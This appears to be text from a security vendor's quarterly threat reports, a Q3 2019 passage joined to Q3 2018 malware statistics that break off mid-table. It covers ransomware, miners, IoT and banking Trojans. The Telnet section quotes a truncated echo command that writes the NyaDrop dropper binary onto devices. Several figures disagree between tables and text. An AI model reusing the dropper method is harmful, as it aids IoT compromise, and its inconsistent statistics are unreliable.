In April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered – CVE-2019-2729. Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.

Ransomware continues to be a major headache for consumers and businesses alike.
Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).

### The impact of web mining

[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of its [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected – most people seldom use most of their computer's processing power, and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model – using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have?
We recently tried to quantify the economic and environmental impact of web miners, and thereby evaluate the positive benefit of protecting against mining.

The total power saving can be calculated using the formula ·N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8±11.8 gigawatts (GW) – twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '·N·t', where 't' is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to €250,000 for residents in Europe.

You can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).

### Mac OS threat landscape

Some people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so has the number of threats targeting them.

Our database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS.
From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category – these threats are easier to create, offering a better return on investment for cybercriminals.

The number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years – by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million – already an increase of 9% over the previous year.

You can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).

### Smart home vulnerabilities

One of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and its IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house.
They also discarded the idea of exploiting the programming language interpreter \u2013 the Fibaro hub used the patched version.\n\nOur researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).\n\n### Security of smart buildings\n\nThis quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) \u2013 sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. 
We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.\n\nMost of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.\n\n### Smart cars and connected devices\n\nKaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience \u2013 from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and reviewed their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.\n\nWe found the security of these devices more or less adequate, leaving aside minor issues. 
This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.\n\nWe continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems \u2013 including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.\n\nIf you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.\n\n### Personal data theft\n\nWe've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress. 
Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) \u2013 CafePress didn't notify its customers until some months after the breach had occurred.\n\nIn August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.\n\n[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.\n\nOn September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.\n\nConsumers have no direct control over the security of the personal data they disclose to online providers. 
However, we can limit the damage of a security breach at an online provider by ensuring that we create passwords that are unique and hard to guess, or use a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.

It's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).

Source: "IT threat evolution Q3 2019", securelist blog, published 2019-11-29, https://securelist.com/it-threat-evolution-q3-2019/95268/ (CVEs referenced in the record: CVE-2017-11882, CVE-2018-0802, CVE-2019-2725, CVE-2019-2729).

Source: securelist blog record, last seen 2018-11-30.

_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._

## Q3 figures

According to Kaspersky Security Network:

* Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.
* 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.
* Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.
* Ransomware attacks were registered on the computers of 259,867 unique users.
* Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.
* Kaspersky Lab products for mobile devices detected:
  * 1,305,015 malicious installation packages
  * 55,101 installation packages for mobile banking Trojans
  * 13,075 installation packages for mobile ransomware Trojans.

## Mobile threats

### Q3 events

Perhaps the biggest news of the reporting period was the [Trojan-Banker.AndroidOS.Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) epidemic. It peaked in September when more than 250,000 unique users were attacked – and that only includes statistics for those with Kaspersky Lab's mobile products installed on their devices.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01.png>)

_Number of users attacked by the mobile banker Asacub in 2017 and 2018_

The scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan's versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It's impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable.
### Mobile threat statistics

In Q3 2018, Kaspersky Lab detected **1,305,015** malicious installation packages, which is 439,229 fewer packages than in the previous quarter.

_Number of detected malicious installation packages, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150155/it-threat-evolution-q3-2018-statistics_02.png>)

#### Distribution of detected mobile apps by type

Among all the threats detected in Q3 2018, the lion's share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.

_Distribution of newly detected mobile apps by type, Q2 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/12081111/it-threat-evolution-q3-2018-statistics_03.png>)

Second place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p. Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.

The share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).

The statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1, to 4.38% of all detected threats in Q3.

**TOP 20 mobile malware**

| # | Verdicts* | %** |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 55.85 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 11.39 |
| 3 | Trojan-Banker.AndroidOS.Asacub.a | 5.28 |
| 4 | Trojan-Banker.AndroidOS.Asacub.snt | 5.10 |
| 5 | Trojan.AndroidOS.Piom.toe | 3.23 |
| 6 | Trojan.AndroidOS.Dvmap.a | 3.12 |
| 7 | Trojan.AndroidOS.Triada.dl | 3.09 |
| 8 | Trojan-Dropper.AndroidOS.Tiny.d | 2.88 |
| 9 | Trojan-Dropper.AndroidOS.Lezok.p | 2.78 |
| 10 | Trojan.AndroidOS.Agent.rt | 2.74 |
| 11 | Trojan-Banker.AndroidOS.Asacub.ci | 2.62 |
| 12 | Trojan-Banker.AndroidOS.Asacub.cg | 2.51 |
| 13 | Trojan-Banker.AndroidOS.Asacub.ce | 2.29 |
| 14 | Trojan-Dropper.AndroidOS.Agent.ii | 1.77 |
| 15 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.75 |
| 16 | Trojan.AndroidOS.Agent.pac | 1.61 |
| 17 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.59 |
| 18 | Exploit.AndroidOS.Lotoor.be | 1.55 |
| 19 | Trojan.AndroidOS.Piom.uwp | 1.48 |
| 20 | Trojan.AndroidOS.Piom.udo | 1.36 |

_* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware._
_** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._

First place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that's detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company's cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.

In second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

Third and fourth places went to representatives of the Asacub mobile banker family – Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).

#### Geography of mobile threats

_Map of attempted infections using mobile malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151353/it-threat-evolution-q3-2018-statistics_04_en.png>)

**TOP 10 countries by share of users attacked by mobile malware:**

| # | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 35.91 |
| 2 | Nigeria | 28.54 |
| 3 | Iran | 28.07 |
| 4 | Tanzania | 28.03 |
| 5 | China | 25.61 |
| 6 | India | 25.25 |
| 7 | Pakistan | 25.08 |
| 8 | Indonesia | 25.02 |
| 9 | Philippines | 23.07 |
| 10 | Algeria | 22.88 |

_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._
_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

In Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.

### Mobile banking Trojans

During the reporting period, we detected **55,101** installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018.

The largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck – this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.

_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150645/it-threat-evolution-q3-2018-statistics_05.png>)

| # | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Banker.AndroidOS.Asacub.a | 33.27 |
| 2 | Trojan-Banker.AndroidOS.Asacub.snt | 32.16 |
| 3 | Trojan-Banker.AndroidOS.Asacub.ci | 16.51 |
| 4 | Trojan-Banker.AndroidOS.Asacub.cg | 15.84 |
| 5 | Trojan-Banker.AndroidOS.Asacub.ce | 14.46 |
| 6 | Trojan-Banker.AndroidOS.Asacub.cd | 6.66 |
| 7 | Trojan-Banker.AndroidOS.Svpeng.q | 3.25 |
| 8 | Trojan-Banker.AndroidOS.Asacub.cf | 2.07 |
| 9 | Trojan-Banker.AndroidOS.Asacub.bz | 1.68 |
| 10 | Trojan-Banker.AndroidOS.Asacub.bw | 1.68 |

_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._

In Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.

_Geography of mobile banking threats, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151425/it-threat-evolution-q3-2018-statistics_06_en.png>)

**TOP 10 countries by share of users attacked by mobile banking Trojans:**

| # | Country* | %** |
|---|---|---|
| 1 | Russia | 2.18 |
| 2 | South Africa | 2.16 |
| 3 | Malaysia | 0.53 |
| 4 | Ukraine | 0.41 |
| 5 | Australia | 0.39 |
| 6 | China | 0.35 |
| 7 | South Korea | 0.33 |
| 8 | Tajikistan | 0.30 |
| 9 | USA | 0.27 |
| 10 | Poland | 0.25 |

_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._
_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

In Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter's leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.

### Mobile ransomware Trojans

In Q3 2018, we detected **13,075** installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.

_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150710/it-threat-evolution-q3-2018-statistics_07.png>)

| # | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 47.79 |
| 2 | Trojan-Ransom.AndroidOS.Svpeng.ah | 26.55 |
| 3 | Trojan-Ransom.AndroidOS.Zebt.a | 6.71 |
| 4 | Trojan-Ransom.AndroidOS.Fusob.h | 6.23 |
| 5 | Trojan-Ransom.AndroidOS.Rkor.g | 5.50 |
| 6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 3.38 |
| 7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 2.15 |
| 8 | Trojan-Ransom.AndroidOS.Egat.d | 1.94 |
| 9 | Trojan-Ransom.AndroidOS.Small.as | 1.43 |
| 10 | Trojan-Ransom.AndroidOS.Small.cj | 1.23 |

_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._

In Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family – Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks. The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.

_Geography of mobile ransomware Trojans, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151458/it-threat-evolution-q3-2018-statistics_08_en.png>)

**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**

| # | Country* | %** |
|---|---|---|
| 1 | USA | 1.73 |
| 2 | Kazakhstan | 0.36 |
| 3 | China | 0.14 |
| 4 | Italy | 0.12 |
| 5 | Iran | 0.11 |
| 6 | Belgium | 0.10 |
| 7 | Switzerland | 0.09 |
| 8 | Poland | 0.09 |
| 9 | Mexico | 0.09 |
| 10 | Romania | 0.08 |

_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._
_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

Just like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.

## Attacks on IoT devices

In this quarter's report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types.

| Service | % |
|---|---|
| Telnet | 99.4% |
| SSH | 0.6% |

_The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018_

### Telnet attacks

_Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151529/it-threat-evolution-q3-2018-statistics_09_en.png>)

**TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.**

| # | Country | %* |
|---|---|---|
| 1 | China | 27.15% |
| 2 | Brazil | 10.57% |
| 3 | Russia | 7.87% |
| 4 | Egypt | 7.43% |
| 5 | USA | 4.47% |
| 6 | South Korea | 3.57% |
| 7 | India | 2.59% |
| 8 | Taiwan | 2.17% |
| 9 | Turkey | 1.82% |
| 10 | Italy | 1.75% |

_* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet._

In Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.

Successful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains shellcode that downloads other malware from the same source computer that has just infected the victim IoT device. The shellcode doesn't require any utilities – it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.

It was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:

1. After successfully infecting a device, Hajime scans the network to find new victims.
2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.
3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.

All these actions are only required because it's quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:

    echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00

480 bytes can be sent this way, but sending 60 KB becomes problematic.

**TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**

| # | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Downloader.Linux.NyaDrop.b | 62.24% |
| 2 | Backdoor.Linux.Mirai.ba | 16.31% |
| 3 | Backdoor.Linux.Mirai.b | 12.01% |
| 4 | Trojan-Downloader.Shell.Agent.p | 1.53% |
| 5 | Backdoor.Linux.Mirai.c | 1.33% |
| 6 | Backdoor.Linux.Gafgyt.ay | 1.15% |
| 7 | Backdoor.Linux.Mirai.au | 0.83% |
| 8 | Backdoor.Linux.Gafgyt.bj | 0.61% |
| 9 | Trojan-Downloader.Linux.Mirai.d | 0.51% |
| 10 | Backdoor.Linux.Mirai.bj | 0.37% |

_* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._

The rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.

## Financial threats

### Q3 events

The banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&C/bot communication protocol but also an extended list of organizations targeted by the malware.
Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.

To recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan's main body.

### Financial threat statistics

In Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.

_Number of unique users attacked by financial malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151555/it-threat-evolution-q3-2018-statistics_10_en.png>)

#### Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.

_Geography of banking malware attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151629/it-threat-evolution-q3-2018-statistics_11_en.png>)

**TOP 10 countries by percentage of attacked users**

| # | Country* | %** |
|---|---|---|
| 1 | Germany | 3.0 |
| 2 | South Korea | 2.8 |
| 3 | Greece | 2.3 |
| 4 | Malaysia | 2.1 |
| 5 | Serbia | 2.0 |
| 6 | United Arab Emirates | 1.9 |
| 7 | Portugal | 1.9 |
| 8 | Lithuania | 1.9 |
| 9 | Indonesia | 1.8 |
| 10 | Cambodia | 1.8 |

_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._
_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in that country._

**TOP 10 banking malware families**

| # | Name | Verdicts | %* |
|---|---|---|---|
| 1 | Zbot | Trojan.Win32.Zbot | 25.8 |
| 2 | Nymaim | Trojan.Win32.Nymaim | 18.4 |
| 3 | SpyEye | Backdoor.Win32.SpyEye | 18.1 |
| 4 | RTM | Trojan-Banker.Win32.RTM | 9.2 |
| 5 | Emotet | Backdoor.Win32.Emotet | 5.9 |
| 6 | Neurevt | Trojan.Win32.Neurevt | 4.7 |
| 7 | Tinba | Trojan-Banker.Win32.Tinba | 2.8 |
| 8 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.4 |
| 9 | Gozi | Trojan.Win32.Gozi | 1.6 |
| 10 | Trickster | Trojan.Win32.Trickster | 1.4 |

_* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats._

In Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.

Overall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground – from 27% in Q2 to 18.4% in Q3 – and fell to second.

## Cryptoware programs

### Q3 events

In early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts' attention was that in some cases the downloader now delivers a [miner](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>) instead of ransomware as was always the case with this malware family in the past.

August saw the detection of the rather unusual [KeyPass](<https://securelist.com/keypass-ransomware/87412/>) ransomware. Its creators apparently decided to make provisions for all possible infection scenarios – via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.

Meanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the [CoinVault](<https://securelist.com/coinvault-are-we-reaching-the-end-of-the-nightmare/72187/>) ransomware [were found guilty](<https://securelist.com/coinvault-the-court-case/86503/>) in the Netherlands.

### Statistics

#### Number of new modifications

In Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.

_Number of new cryptoware modifications, Q4 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151203/it-threat-evolution-q3-2018-statistics_12.png>)

#### Number of users attacked by Trojan cryptors

In Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.

_Number of unique users attacked by Trojan cryptors, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151654/it-threat-evolution-q3-2018-statistics_13_en.png>)

#### Geography of attacks

_Geography of Trojan cryptors attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151726/it-threat-evolution-q3-2018-statistics_14_en.png>)

**TOP 10 countries attacked by Trojan cryptors**

| # | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 5.80 |
| 2 | Uzbekistan | 3.77 |
